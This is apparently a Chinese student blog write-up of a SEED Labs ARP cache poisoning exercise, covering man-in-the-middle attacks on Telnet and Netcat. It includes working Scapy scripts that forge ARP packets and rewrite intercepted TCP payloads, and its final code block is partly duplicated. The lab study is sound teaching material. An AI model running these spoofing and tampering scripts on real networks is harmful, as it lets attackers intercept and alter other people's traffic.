Fork me on GitHub

seedlab实验ARP缓存中毒攻击

字数统计: 1.7k字   |   阅读时长≈ 7分

seedlab实验ARP缓存中毒攻击

一、实验目标

使用ARP中毒进行中间人攻击(代码位于底部)

二、实验原理

地址解析协议(ARP)是一种通信协议,用于发现给定IP地址的链路层地址,例如MAC地址。ARP协议是一个非常简单的协议,它没有实现任何安全措施。ARP缓存中毒攻击是针对ARP协议的常见攻击。在这种攻击下,攻击者可以欺骗受害者以接受伪造的IP到MAC映射。这可能导致受害者的数据包使用伪造的MAC地址重定向到计算机。
此实验就是在ubuntu下模拟该机制

三、实验步骤及运行结果

Task1.ARP缓存中毒

A、使用ARP请求报文,攻击者向A发送ARP请求报文,观察attacker的MAC地址是否和B的IP匹配。
发现除了attacker向A发之外,B也要向A发,这样ARP表中才有B的IP地址。

发现并不匹配。

B、使用ARP请求报文,攻击者向A发送ARP响应报文,观察attacker的MAC地址是否和B的IP匹配。

依旧不匹配。
C、发送无故ARP报文。

该报文作用就是告诉局域网内其他主机该更新ARP表了。

Task2.利用ARP缓存中毒对Telnet的MITM攻击

Step1:

启动ARP缓存中毒攻击。主机缓存先中毒攻击A和B,使得在A的ARP缓存中,B的IP地址映射到M的MAC地址,而在B的ARP缓存,A的IP地址也映射到M的MAC地址。在这一步之后,在A和B之间发送数据包。我们将使用任务1的ARP缓存中毒攻击来实现这个目标。
首先发送源IP和目的IP都为A,MAC地址为attacker的地址的无故ARP报文。

发现在B中,A的IP地址对应为attacker的MAC地址。

之后,发送源IP和目的IP都为B,MAC地址为attacker的地址的无故ARP报文。

发现在A中,B的IP地址对应为attacker的MAC地址。

Step2:

攻击成功后,请尝试在主机A和主机B之间互相ping,并且报告你的观察结果。请在报告中显示Wireshark的结果。

此时A ping到B 的话,一开始会有几个无响应的ICMP报文发出,之后发出ARP包更新为可用的MAC地址。

A:

B:

step3:

现在我们打开主机M上的IP转发,因此它将转发A和B之间的数据包。请运行以下命令并重复步骤2。请描述一下你的观察。

一开始会由attacker转发报文,表示能够转发,但是时间一长,依旧会发送ARP包,更新地址。所以需要在实验中一直发送无故ARP报文。

A:

B:

step4:

建立telnet连接,对A到B的tcp包的数据进行修改,对B到A的包不做修改。因为修改ARP之后,一段时间内会自动变回来,所以在实验过程中要一直发ARP修改报文。
之后对于伪造程序而言,需要修改filter以过滤出只有这A和B之间转发的报文,可以通过过滤端口来实现。
最后实验效果如下:
在键盘上敲下4个a

之后关闭M的转发机制:
再次重复上述步骤,结果如下:

只要ARP无故报文一直在发,那么M就不会转发报文,那么就会一直没有回显。同样也不会有B到A的报文,因为B都不知道。

Task3:利用ARP缓存中毒对Netcat的MITM攻击

利用上图的方式建立Netcat连接
一旦建立了连接,就可以在A上键入消息。每行消息都将被放入发送到B的TCP数据包中,后者只显示消息。任务是用a序列替换消息中出现的每个名字。该序列的长度应该与名字的长度相同,否则将弄乱TCP序列号,从而弄乱整个TCP连接。
之后对于伪造程序而言,需要修改filter以过滤出只有这A和B之间转发的报文,可以通过过滤MAC地址来实现。
成功之后,在客户端输入名字长度的字符,在服务端有名字的回显。

攻击成功

四、代码

Task1、

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
1
from scapy.all import *
src_mac='00:0c:29:b8:73:d8'
dst_mac='00:0c:29:49:21:29'
src_ip='10.0.2.4'
dst_ip='10.0.2.1'
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp
sendp(pkt)
2
from scapy.all import *
src_mac='00:0c:29:b8:73:d8'
dst_mac='00:0c:29:d3:53:a1'
src_ip='10.0.2.4'
dst_ip='10.0.2.3'
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)
3
from scapy.all import *
src_mac='00:0c:29:b8:73:d8'
dst_mac='ff:ff:ff:ff:ff:ff'
src_ip='10.0.2.1'
dst_ip='10.0.2.1'
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp
while 1:
sendp(pkt)
4
from scapy.all import *
src_mac='00:0c:29:b8:73:d8'
dst_mac='ff:ff:ff:ff:ff:ff'
src_ip='10.0.2.3'
dst_ip='10.0.2.3'
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp
while 1:
sendp(pkt)

Task2:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from scapy.all import *
VM_A_IP = "10.0.2.1"
VM_B_IP = "10.0.2.3"
def spoof_pkt(pkt):
if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:
# Create a new packet based on the captured one.
# (1) We need to delete the checksum fields in the IP and TCP headers,
# because our modification will make them invalid.
# Scapy will recalculate them for us if these fields are missing.
# (2) We also delete the original TCP payload.
newpkt = pkt[IP]
del(newpkt.chksum)
del(newpkt[TCP].chksum)
del(newpkt[TCP].payload)
#####################################################################
# Construct the new payload based on the old payload.
# Students need to implement this part.
#olddata = pkt[TCP].payload.load # Get the original payload data
newdata = str.encode('Z') # No change is made in this sample code
#####################################################################
# Attach the new data and set the packet out
send(newpkt/newdata)
elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:
send(pkt[IP]) # Forward the original packet
pkt = sniff(filter='tcp and port 23',prn=spoof_pkt)

Task3:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from scapy.all import *
VM_A_IP = "10.0.2.3"
VM_B_IP = "10.0.2.1"
8
def spoof_pkt(pkt):
if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:
# Create a new packet based on the captured one.
# (1) We need to delete the checksum fields in the IP and TCP headers,
# because our modification will make them invalid.
# Scapy will recalculate them for us if these fields are missing.
# (2) We also delete the original TCP payload.
newpkt = pkt[IP]
del(newpkt.chksum)
del(newpkt[TCP].chksum)
del(newpkt[TCP].payload)
#####################################################################
# Construct the new payload based on the old payload.
# Students need to implement this part.
#olddata = pkt[TCP].payload.load # Get the original payload data
newdata = str.encode('liyantao') # No change is made in this sample code
#####################################################################
# Attach the new data and set the packet out
send(newpkt/newdata)
elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:
send(pkt[IP]) # Forward the original packet
pkt = sniff(filter='tcp and (ether src 00:0c:29:d3:53:a1 or ether src 00:0c:29:49:21:29)',prn=spoof_pkt)
Attach the new data and set the packet out
send(newpkt/newdata)
elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:
send(pkt[IP]) # Forward the original packet
pkt = sniff(filter='tcp and (ether src 00:0c:29:d3:53:a1 or ether src 00:0c:29:49:21:29)',prn=spoof_pkt)

谢谢你请我吃糖果

微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要涉及技术:
CTF-pwn、安全、
密码、Linux

联系QQ:3028115458